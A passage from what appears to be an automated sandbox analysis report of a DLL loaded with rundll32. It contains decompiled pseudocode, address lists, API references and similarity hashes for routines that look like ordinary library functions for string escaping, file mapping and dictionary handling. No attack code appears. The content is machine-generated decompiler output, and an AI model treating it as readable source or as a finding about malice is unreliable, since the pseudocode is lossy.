                                                      													__eax = __esi;
                                                      													L1();
                                                      												} else {
                                                      													 *__esp = __esi;
                                                      													__edi = 0x100ac513;
                                                      													__ebp = 0x100ac500;
                                                      													_v52 = 0x100ac513;
                                                      													_v56 = 0x100ac500;
                                                      													__eax = L100089C0();
                                                      												}
                                                      											}
                                                      										}
                                                      										goto L41;
                                                      										L41:
                                                      										__eax =  *(__ebx + 1) & 0x000000ff;
                                                      										__ebx = __ebx + 1;
                                                      										__eflags = __al;
                                                      									} while (__al != 0);
                                                      								}
                                                      							}
                                                      						}
                                                      					}
                                                      					L53:
                                                      					return __eax;
                                                      				}
                                                      				L122:
                                                      			}














































                                                      0x00000000
                                                      0x00000000
                                                      0x10009af8
                                                      0x10009afb
                                                      0x10009b00
                                                      0x10009b04
                                                      0x10009b09
                                                      0x10009b0d
                                                      0x00000000
                                                      0x00000000
                                                      0x10009adc
                                                      0x10009adf
                                                      0x10009ae4
                                                      0x10009ae9
                                                      0x10009aed
                                                      0x10009af1
                                                      0x00000000
                                                      0x00000000
                                                      0x10009ac0
                                                      0x10009ac3
                                                      0x10009ac8
                                                      0x10009acd
                                                      0x10009ad1
                                                      0x10009ad5
                                                      0x00000000
                                                      0x00000000
                                                      0x10009a92
                                                      0x10009a92
                                                      0x10009a96
                                                      0x10009a97
                                                      0x10009a97
                                                      0x00000000
                                                      0x100099f0
                                                      0x10009a4d
                                                      0x00000000
                                                      0x10009a40
                                                      0x10009a40
                                                      0x10009a44
                                                      0x10009a45
                                                      0x10009a45
                                                      0x00000000
                                                      0x10009a4d
                                                      0x10009a4d
                                                      0x10009a4f
                                                      0x10009c10
                                                      0x10009c13
                                                      0x10009c18
                                                      0x10009c1d
                                                      0x10009c21
                                                      0x10009c25
                                                      0x10009a55
                                                      0x10009a55
                                                      0x10009a10
                                                      0x10009a12
                                                      0x10009c30
                                                      0x10009c33
                                                      0x10009c38
                                                      0x10009c3c
                                                      0x10009c41
                                                      0x10009c45
                                                      0x10009a18
                                                      0x10009a18
                                                      0x10009a1a
                                                      0x00000000
                                                      0x10009a20
                                                      0x10009a20
                                                      0x10009a23
                                                      0x10009a28
                                                      0x10009a2d
                                                      0x10009a31
                                                      0x10009a35
                                                      0x10009a35
                                                      0x10009a1a
                                                      0x10009a57
                                                      0x10009a57
                                                      0x10009a60
                                                      0x10009b90
                                                      0x10009b90
                                                      0x10009b93
                                                      0x10009b95
                                                      0x10009a66
                                                      0x10009a66
                                                      0x10009a69
                                                      0x10009a6e
                                                      0x10009a73
                                                      0x10009a77
                                                      0x10009a7b
                                                      0x10009a7b
                                                      0x10009a60
                                                      0x10009a55
                                                      0x00000000
                                                      0x1000977a
                                                      0x1000977a
                                                      0x1000977c
                                                      0x100098ff
                                                      0x100098ff
                                                      0x10009901
                                                      0x10009bd0
                                                      0x10009bd3
                                                      0x10009bd8
                                                      0x10009bdd
                                                      0x10009be1
                                                      0x10009be5
                                                      0x10009907
                                                      0x10009907
                                                      0x10009909
                                                      0x100098e0
                                                      0x100098e2
                                                      0x10009bb0
                                                      0x10009bb3
                                                      0x10009bb8
                                                      0x10009bbc
                                                      0x10009bc1
                                                      0x10009bc5
                                                      0x100098e8
                                                      0x100098e8
                                                      0x100098eb
                                                      0x100098ed
                                                      0x100098ed
                                                      0x1000990b
                                                      0x1000990b
                                                      0x1000990e
                                                      0x10009913
                                                      0x10009918
                                                      0x1000991c
                                                      0x10009920
                                                      0x10009920
                                                      0x10009909
                                                      0x100098f2
                                                      0x100098f6
                                                      0x100098f7
                                                      0x100098f7
                                                      0x10009782
                                                      0x100097cd
                                                      0x100097cd
                                                      0x100097cf
                                                      0x10009bf0
                                                      0x10009bf3
                                                      0x10009bf8
                                                      0x10009bfd
                                                      0x10009c01
                                                      0x10009c05
                                                      0x100097d5
                                                      0x100097d5
                                                      0x10009788
                                                      0x1000978a
                                                      0x10009c50
                                                      0x10009c53
                                                      0x10009c58
                                                      0x10009c5c
                                                      0x10009c61
                                                      0x10009c65
                                                      0x10009790
                                                      0x10009790
                                                      0x10009792
                                                      0x00000000
                                                      0x10009798
                                                      0x10009798
                                                      0x1000979b
                                                      0x100097a0
                                                      0x100097a4
                                                      0x100097a9
                                                      0x100097ad
                                                      0x100097ad
                                                      0x10009792
                                                      0x100097d7
                                                      0x100097d7
                                                      0x100097e0
                                                      0x10009b80
                                                      0x10009b80
                                                      0x10009b83
                                                      0x10009b85
                                                      0x100097e6
                                                      0x100097e6
                                                      0x100097e9
                                                      0x100097ee
                                                      0x100097f3
                                                      0x100097f7
                                                      0x100097fb
                                                      0x100097fb
                                                      0x100097e0
                                                      0x100097d5
                                                      0x00000000
                                                      0x100097c0
                                                      0x100097c0
                                                      0x100097c4
                                                      0x100097c5
                                                      0x100097c5
                                                      0x100097cd
                                                      0x1000977c
                                                      0x10009774
                                                      0x10009766
                                                      0x10009869
                                                      0x10009869
                                                      0x10009869
                                                      0x00000000

                                                      APIs
                                                      • mv_bprintf.MAIN(?,?,?,?,?,?,?,?,?,?,100070AF), ref: 100097AD
                                                      • mv_bprintf.MAIN(?,?,?,?,?,?,?,?,?,?,100070AF), ref: 100097FB
                                                      • strchr.MSVCRT ref: 1000983B
                                                      • mv_bprintf.MAIN(?,?,?,?,?,?,?,?,?,?,100070AF), ref: 10009920
                                                      • mv_bprintf.MAIN(?,?,?,?,?,?,?,?,?,?,100070AF), ref: 10009C05
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_bprintf$strchr
                                                      • String ID: &amp;$&apos;$&gt;$&lt;$&quot;$'\''
                                                      • API String ID: 2626076477-3929336650
                                                      • Opcode ID: 12b6750b4a52a26ed5acad3795ae941bdf77578173880ce7d0d3f74c73066fa8
                                                      • Instruction ID: db27ddebd36c8a04df1f9b29fc46dfe65a5f1e33d3c32a01edac565b911f7663
                                                      • Opcode Fuzzy Hash: 12b6750b4a52a26ed5acad3795ae941bdf77578173880ce7d0d3f74c73066fa8
                                                      • Instruction Fuzzy Hash: 7BD18174908B95CAE710DF29804076EBBE1FF826C0F56881EF9D58B20AD735E985D783
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph (legend: Executed, Not Executed)
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: _errnomv_callocmv_freep$ByteCharMultiWidewcscatwcscpywcslen$_sopen_wsopen
                                                      • String ID: \\?\$\\?\UNC\
                                                      • API String ID: 2585690843-3019864461
                                                      • Opcode ID: 3b770d789a6b7b9b259c4104553542867824734224feeea9d00b87784f6ee047
                                                      • Instruction ID: f678d7e62f75a51a3396b5e92a4772b9af71e601e6ce56c2c03e9c047c1b1921
                                                      • Opcode Fuzzy Hash: 3b770d789a6b7b9b259c4104553542867824734224feeea9d00b87784f6ee047
                                                      • Instruction Fuzzy Hash: 8F91C2B49097119FD350EF69C98421EBBE0FF89754F55892EF898CB390E774D8809B82
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph (legend: Executed, Not Executed)
                                                      C-Code - Quality: 25%
                                                      			E1001C790(void* __eflags, intOrPtr* _a4, intOrPtr _a8) {
                                                      				intOrPtr _v40;
                                                      				intOrPtr _t10;
                                                      				void* _t11;
                                                      				intOrPtr* _t12;
                                                      				signed int _t16;
                                                      				intOrPtr _t17;
                                                      				intOrPtr* _t18;
                                                      				void* _t19;
                                                      				intOrPtr* _t21;
                                                      				void* _t22;
                                                      				intOrPtr* _t23;
                                                      
                                                      				_t10 = 0x100b2e05;
                                                      				_t16 = 0;
                                                      				_t23 = _t22 - 0x1c;
                                                      				_t21 = _a4;
                                                      				_t17 = _a8;
                                                      				 *_t21 = 0;
                                                      				while(1) {
                                                      					_v40 = _t10;
                                                      					 *_t23 = _t17;
                                                      					_t11 = L10006B30();
                                                      					_t19 = _t11;
                                                      					if(_t11 == 0) {
                                                      						break;
                                                      					}
                                                      					_t16 = _t16 + 1;
                                                      					if(_t16 != 0xf) {
                                                      						_t10 =  *((intOrPtr*)(0x100b3000 + _t16 * 8));
                                                      						continue;
                                                      					} else {
                                                      						return 0xffffffea;
                                                      					}
                                                      					L19:
                                                      				}
                                                      				 *_t23 = 0x10;
                                                      				_t12 = E100265E0();
                                                      				_t18 = _t12;
                                                      				if(_t12 == 0) {
                                                      					L18:
                                                      					_t19 = 0xfffffff4;
                                                      				} else {
                                                      					 *(_t12 + 4) = _t16;
                                                      					if(_t16 > 0xd) {
                                                      						L10:
                                                      						 *_t21 = _t18;
                                                      					} else {
                                                      						switch( *((intOrPtr*)(_t16 * 4 +  &M100B2E0C))) {
                                                      							case 0:
                                                      								__eax = L10025C70();
                                                      								goto L9;
                                                      							case 1:
                                                      								__eax = E100274A0();
                                                      								goto L9;
                                                      							case 2:
                                                      								__eax = L10039950();
                                                      								goto L9;
                                                      							case 3:
                                                      								__eax = E1003E680();
                                                      								goto L9;
                                                      							case 4:
                                                      								_t14 = E10049740();
                                                      								L9:
                                                      								 *_t18 = _t14;
                                                      								if(_t14 == 0) {
                                                      									 *_t23 = _t18;
                                                      									L100265B0();
                                                      									goto L18;
                                                      								} else {
                                                      									goto L10;
                                                      								}
                                                      								goto L11;
                                                      							case 5:
                                                      								 *((intOrPtr*)(__edi + 8)) = L1000FDB0(__ebx, 4);
                                                      								goto L10;
                                                      						}
                                                      					}
                                                      				}
                                                      				L11:
                                                      				return _t19;
                                                      				goto L19;
                                                      			}















                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: mv_malloczmv_strcasecmp
                                                      • String ID: MD5
                                                      • API String ID: 1451953452-1168476579
                                                      • Opcode ID: fd8ebb722839f17aaf6157ba037008f289ae86b4bf847cb60b004431fafa5101
                                                      • Instruction ID: eb5494de89beb9ab75199d641261a1b3f1512631375a939401cd0d8990c0213e
                                                      • Opcode Fuzzy Hash: fd8ebb722839f17aaf6157ba037008f289ae86b4bf847cb60b004431fafa5101
                                                      • Instruction Fuzzy Hash: BB91F4B4909705DFC710DF68C080A1EBBE0FF89354F55896EE9888B362E735D980EB56
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 573 10011560-100115c5 call 10011040 mv_strdup 576 10011758 573->576 577 100115cb-100115d7 573->577 578 1001175d-1001175f 576->578 579 100116d0-100116f2 mv_dict_get 577->579 580 100115dd-100115e5 577->580 581 10011765 578->581 582 10011699-100116ac call 100265b0 * 2 578->582 583 10011670-10011680 mv_strdup 580->583 584 100115eb-100115f1 580->584 587 1001168f-10011693 581->587 600 100116b1-100116c6 582->600 585 10011700-1001171a mv_mallocz 583->585 586 10011682-10011684 583->586 584->585 589 100115f7-100115f9 584->589 595 10011840-10011845 585->595 596 10011720-10011722 585->596 590 10011728-1001172c 586->590 591 1001168a 586->591 587->582 592 10011770-10011787 mv_freep * 2 587->592 589->591 594 100115ff-10011601 589->594 591->587 592->582 598 100117b0-100117cf mv_realloc_array 594->598 599 10011607-1001160f 594->599 595->578 596->590 596->595 598->591 601 100117d5-100117da 598->601 602 10011615-10011623 599->602 603 10011738-1001174e call 100265b0 * 2 599->603 604 100117e0-1001180b strlen * 2 mv_realloc 602->604 605 10011629-10011656 call 100265b0 * 2 602->605 603->600 604->591 607 10011811-1001181d 604->607 622 10011790-10011792 605->622 623 1001165c-1001166d 605->623 611 10011870-10011876 607->611 612 1001181f-1001183b mv_freep 607->612 615 10011898-100118a2 611->615 616 10011878-1001187e 611->616 615->616 618 10011880-10011886 616->618 619 100118a4-100118b4 616->619 618->612 621 10011888-10011896 618->621 619->618 621->612 624 10011850-10011867 mv_freep * 2 622->624 625 10011798-100117a6 mv_freep 622->625 623->600 624->611 624->625 625->600
                                                      C-Code - Quality: 17%
                                                      			E10011560(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi, intOrPtr __ebp, signed int* _a4, signed int* _a8, signed int _a12, intOrPtr _a16, signed int _a20) {
                                                      				intOrPtr _v4;
                                                      				intOrPtr _v8;
                                                      				intOrPtr _v12;
                                                      				intOrPtr _v16;
                                                      				char _v50;
                                                      				void* _v56;
                                                      				void* _v60;
                                                      				void* _v64;
                                                      				intOrPtr _v92;
                                                      				signed int _v96;
                                                      				signed int* _v100;
                                                      				signed int* _v104;
                                                      				signed int* _t89;
                                                      				signed int* _t98;
                                                      				signed int* _t99;
                                                      				signed int _t104;
                                                      				void* _t105;
                                                      				int _t109;
                                                      				int _t110;
                                                      				void* _t112;
                                                      				signed int _t116;
                                                      				signed int* _t121;
                                                      				signed int _t127;
                                                      				int _t129;
                                                      				signed int _t130;
                                                      				intOrPtr* _t133;
                                                      				signed int* _t134;
                                                      				void* _t136;
                                                      				signed int* _t140;
                                                      				signed int* _t142;
                                                      				int _t143;
                                                      				void* _t144;
                                                      				signed int* _t149;
                                                      				void* _t150;
                                                      				signed int* _t152;
                                                      				signed int _t153;
                                                      				int _t155;
                                                      				signed int _t156;
                                                      				void _t158;
                                                      				signed int** _t162;
                                                      				signed int** _t163;
                                                      
                                                      				_v16 = __ebx;
                                                      				_v12 = __esi;
                                                      				_v104 = 0x16;
                                                      				_t149 =  &_v50;
                                                      				 *_t163 = _t149;
                                                      				_v92 = _a16;
                                                      				_v96 = _a12;
                                                      				_v100 = 0x100b1200;
                                                      				_v8 = __edi;
                                                      				_t140 = _a8;
                                                      				_v4 = __ebp;
                                                      				E10011040();
                                                      				_v60 = 0;
                                                      				_t121 =  *_a4;
                                                      				 *_t163 = _t149;
                                                      				_v56 = 0;
                                                      				_t89 = E100267C0(_t121, _t140, _t149, 0);
                                                      				_v56 = _t89;
                                                      				if(_t140 == 0) {
                                                      					_t150 = 0xffffffea;
                                                      					L24:
                                                      					if(_t121 == 0) {
                                                      						L16:
                                                      						 *_t163 = _v60;
                                                      						L100265B0();
                                                      						 *_t163 = _v56;
                                                      						L100265B0();
                                                      						L17:
                                                      						return _t150;
                                                      					}
                                                      					L15:
                                                      					if( *_t121 == 0) {
                                                      						 *_t163 =  &(_t121[1]);
                                                      						E100265C0();
                                                      						 *_t163 = _a4;
                                                      						E100265C0();
                                                      					}
                                                      					goto L16;
                                                      				}
                                                      				_t162 = 0;
                                                      				_t152 = _t89;
                                                      				if((_a20 & 0x00000040) == 0) {
                                                      					_v104 = _t140;
                                                      					_v100 = 0;
                                                      					 *_t163 = _t121;
                                                      					_v96 = _a20 & 0xfffffff7;
                                                      					_t162 = E100110D0();
                                                      				}
                                                      				if((_a20 & 0x00000004) == 0) {
                                                      					 *_t163 = _t140;
                                                      					_t98 = E100267C0(_t121, _t140, _t152, _t162);
                                                      					_v60 = _t98;
                                                      					_t142 = _t98;
                                                      					if(_t121 == 0) {
                                                      						L19:
                                                      						 *_t163 = 8;
                                                      						_t99 = E100265E0();
                                                      						_t142 = _v60;
                                                      						_t121 = _t99;
                                                      						 *_a4 = _t121;
                                                      						if(_t121 == 0 || _t142 == 0) {
                                                      							_t150 = 0xfffffff4;
                                                      							goto L24;
                                                      						} else {
                                                      							L21:
                                                      							_t152 = _v56;
                                                      							L4:
                                                      							if(_t152 == 0) {
                                                      								L14:
                                                      								_t150 = 0xfffffff4;
                                                      								goto L15;
                                                      							}
                                                      							if(_t162 == 0) {
                                                      								_v100 = 8;
                                                      								_v104 =  *_t121 + 1;
                                                      								 *_t163 = _t121[1];
                                                      								_t104 = E100264F0();
                                                      								_t153 = _t104;
                                                      								if(_t104 == 0) {
                                                      									goto L14;
                                                      								}
                                                      								_t121[1] = _t104;
                                                      								_t127 =  *_t121;
                                                      								L10:
                                                      								_t105 = _v56;
                                                      								if(_t105 == 0) {
                                                      									if(_t127 == 0) {
                                                      										 *_t163 =  &(_t121[1]);
                                                      										E100265C0();
                                                      										 *_t163 = _a4;
                                                      										E100265C0();
                                                      									}
                                                      									_t150 = 0;
                                                      									 *_t163 =  &_v60;
                                                      									E100265C0();
                                                      								} else {
                                                      									_t133 = _t153 + _t127 * 8;
                                                      									 *((intOrPtr*)(_t133 + 4)) = _t105;
                                                      									 *_t133 = _v60;
                                                      									_t150 = 0;
                                                      									 *_t121 = _t127 + 1;
                                                      								}
                                                      								goto L17;
                                                      							}
                                                      							if((_a20 & 0x00000010) != 0) {
                                                      								 *_t163 = _t142;
                                                      								_t150 = 0;
                                                      								L100265B0();
                                                      								 *_t163 = _v56;
                                                      								L100265B0();
                                                      								goto L17;
                                                      							}
                                                      							_t134 = _a4;
                                                      							 *_t163 = _t134;
                                                      							if((_a20 & 0x00000020) != 0) {
                                                      								_v64 = _t134;
                                                      								_t109 = strlen(??);
                                                      								 *_t163 = _t152;
                                                      								_t143 = _t109;
                                                      								_t110 = strlen(??);
                                                      								 *_t163 = _v64;
                                                      								_t155 = _t110;
                                                      								_t68 = _t110 + 1; // 0x1
                                                      								_v104 = _t143 + _t68;
                                                      								_t112 = E10026280();
                                                      								if(_t112 == 0) {
                                                      									goto L14;
                                                      								}
                                                      								_t70 = _t155 + 1; // 0x1
                                                      								_t129 = _t70;
                                                      								_t144 = _t143 + _t112;
                                                      								_t136 = _v56;
                                                      								if(_t129 >= 8) {
                                                      									if((_t144 & 0x00000001) != 0) {
                                                      										_t130 =  *_t136 & 0x000000ff;
                                                      										_t144 = _t144 + 1;
                                                      										_t136 = _t136 + 1;
                                                      										 *(_t144 - 1) = _t130;
                                                      										_t129 = _t155;
                                                      									}
                                                      									if((_t144 & 0x00000002) != 0) {
                                                      										_t156 =  *_t136 & 0x0000ffff;
                                                      										_t144 = _t144 + 2;
                                                      										_t136 = _t136 + 2;
                                                      										_t129 = _t129 - 2;
                                                      										 *(_t144 - 2) = _t156;
                                                      									}
                                                      									if((_t144 & 0x00000004) != 0) {
                                                      										_t158 =  *_t136;
                                                      										_t144 = _t144 + 4;
                                                      										_t136 = _t136 + 4;
                                                      										_t129 = _t129 - 4;
                                                      										 *(_t144 - 4) = _t158;
                                                      									}
                                                      								}
                                                      								_v64 = _t112;
                                                      								memcpy(_t144, _t136, _t129);
                                                      								_t163 =  &(_t163[3]);
                                                      								 *_t163 =  &_v56;
                                                      								E100265C0();
                                                      								_v56 = _v64;
                                                      								goto L9;
                                                      							} else {
                                                      								L100265B0();
                                                      								L9:
                                                      								 *_t163 =  *_t162;
                                                      								L100265B0();
                                                      								_t116 =  *_t121;
                                                      								_t153 = _t121[1];
                                                      								_t32 = _t116 - 1; // -1
                                                      								_t127 = _t32;
                                                      								 *_t121 = _t127;
                                                      								 *_t162 =  *(_t153 + _t127 * 8);
                                                      								_a4 =  *(_t153 + 4 + _t127 * 8);
                                                      								goto L10;
                                                      							}
                                                      						}
                                                      					}
                                                      					if(_t98 != 0) {
                                                      						goto L21;
                                                      					}
                                                      					goto L14;
                                                      				}
                                                      				_v60 = _t140;
                                                      				if(_t121 == 0) {
                                                      					goto L19;
                                                      				}
                                                      				goto L4;
                                                      			}

                                                      0x10011749
                                                      0x10011615
                                                      0x10011620
                                                      0x10011623
                                                      0x100117e0
                                                      0x100117e4
                                                      0x100117e9
                                                      0x100117ec
                                                      0x100117ee
                                                      0x100117f7
                                                      0x100117fa
                                                      0x100117fc
                                                      0x10011800
                                                      0x10011804
                                                      0x1001180b
                                                      0x00000000
                                                      0x00000000
                                                      0x10011811
                                                      0x10011811
                                                      0x10011814
                                                      0x10011816
                                                      0x1001181d
                                                      0x10011876
                                                      0x10011898
                                                      0x1001189b
                                                      0x1001189c
                                                      0x1001189d
                                                      0x100118a0
                                                      0x100118a0
                                                      0x1001187e
                                                      0x100118a4
                                                      0x100118a7
                                                      0x100118aa
                                                      0x100118ad
                                                      0x100118b0
                                                      0x100118b0
                                                      0x10011886
                                                      0x10011888
                                                      0x1001188a
                                                      0x1001188d
                                                      0x10011890
                                                      0x10011893
                                                      0x10011893
                                                      0x10011886
                                                      0x1001181f
                                                      0x10011825
                                                      0x10011825
                                                      0x1001182b
                                                      0x1001182e
                                                      0x10011837
                                                      0x00000000
                                                      0x10011629
                                                      0x10011629
                                                      0x1001162e
                                                      0x10011631
                                                      0x10011634
                                                      0x10011639
                                                      0x1001163b
                                                      0x1001163e
                                                      0x1001163e
                                                      0x10011641
                                                      0x1001164a
                                                      0x1001164d
                                                      0x00000000
                                                      0x1001164d
                                                      0x10011623
                                                      0x1001171a
                                                      0x10011684
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x10011684
                                                      0x100115eb
                                                      0x100115f1
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: strlen$mv_freepmv_strdup$_aligned_reallocmv_dict_getmv_malloczmv_reallocmv_realloc_array
                                                      • String ID: $%lld
                                                      • API String ID: 420417855-3617178099
                                                      • Opcode ID: d510e7aac1835d2d14d11394022ecc06c06f3c51c024d220679ff3e81abd8013
                                                      • Instruction ID: 1aac3acce1ec20135028bdf280dbd7ca7379982b25da7d1f386a19304280214e
                                                      • Opcode Fuzzy Hash: d510e7aac1835d2d14d11394022ecc06c06f3c51c024d220679ff3e81abd8013
                                                      • Instruction Fuzzy Hash: 0C912AB5909751CBC754DF28C58065EBBE0FF88384F56892DED848B345EB74E884DB82
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      APIs
                                                      • mvpriv_open.MAIN ref: 1001933F
                                                        • Part of subcall function 100195E0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 10019633
                                                        • Part of subcall function 100195E0: mv_calloc.MAIN ref: 1001964E
                                                        • Part of subcall function 100195E0: MultiByteToWideChar.KERNEL32 ref: 10019685
                                                        • Part of subcall function 100195E0: mv_calloc.MAIN ref: 100196D7
                                                        • Part of subcall function 100195E0: mv_freep.MAIN ref: 10019713
                                                        • Part of subcall function 100195E0: wcslen.MSVCRT ref: 1001971F
                                                        • Part of subcall function 100195E0: _wsopen.MSVCRT ref: 1001974B
                                                      • _fstat64.MSVCRT ref: 10019366
                                                      • _close.MSVCRT ref: 10019394
                                                      • _get_osfhandle.MSVCRT ref: 100193C5
                                                      • CreateFileMappingA.KERNEL32 ref: 100193ED
                                                      • MapViewOfFile.KERNEL32 ref: 10019422
                                                      • CloseHandle.KERNEL32 ref: 10019434
                                                      • mv_log.MAIN ref: 1001945D
                                                      • _close.MSVCRT ref: 10019465
                                                      • _errno.MSVCRT ref: 10019480
                                                      • mv_strerror.MAIN ref: 100194A1
                                                      • mv_log.MAIN ref: 100194C7
                                                      • _errno.MSVCRT ref: 100194D8
                                                      • mv_strerror.MAIN ref: 100194FE
                                                      • mv_log.MAIN ref: 1001951B
                                                      • _close.MSVCRT ref: 10019523
                                                      • mv_log.MAIN ref: 1001954F
                                                      • _close.MSVCRT ref: 10019557
                                                      Strings
                                                      • File size for file '%s' is too big, xrefs: 10019535
                                                      • Cannot read file '%s': %s, xrefs: 100194A6
                                                      • Error occurred in fstat(): %s, xrefs: 1001950B
                                                      • Error occurred in CreateFileMapping(), xrefs: 10019561
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: _closemv_log$ByteCharFileMultiWide_errnomv_callocmv_strerror$CloseCreateHandleMappingView_fstat64_get_osfhandle_wsopenmv_freepmvpriv_openwcslen
                                                      • String ID: Cannot read file '%s': %s$Error occurred in CreateFileMapping()$Error occurred in fstat(): %s$File size for file '%s' is too big
                                                      • API String ID: 2213036534-2445208470
                                                      • Opcode ID: 115248d222d0207b4b6978023f43e634846f62dc27148f7a7cd2e032391e2a57
                                                      • Instruction ID: 617e9db2a449c1ebb97318d6d46501e643e1f1538bb2456b081f200f3c68d203
                                                      • Opcode Fuzzy Hash: 115248d222d0207b4b6978023f43e634846f62dc27148f7a7cd2e032391e2a57
                                                      • Instruction Fuzzy Hash: 6861C0B59097459FC310EF29C48529EFBE4FF88700F41892EE9D98B351E774E9809B82
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      C-Code - Quality: 100%
                                                      			E10012850(intOrPtr* __eax) {
                                                      				intOrPtr _t65;
                                                      				intOrPtr _t82;
                                                      				intOrPtr _t84;
                                                      				intOrPtr _t86;
                                                      				intOrPtr _t88;
                                                      				intOrPtr _t90;
                                                      				signed int _t92;
                                                      				signed int _t93;
                                                      				signed int _t94;
                                                      				signed int _t95;
                                                      				signed int _t96;
                                                      				intOrPtr* _t98;
                                                      				intOrPtr* _t102;
                                                      				intOrPtr* _t106;
                                                      				intOrPtr* _t107;
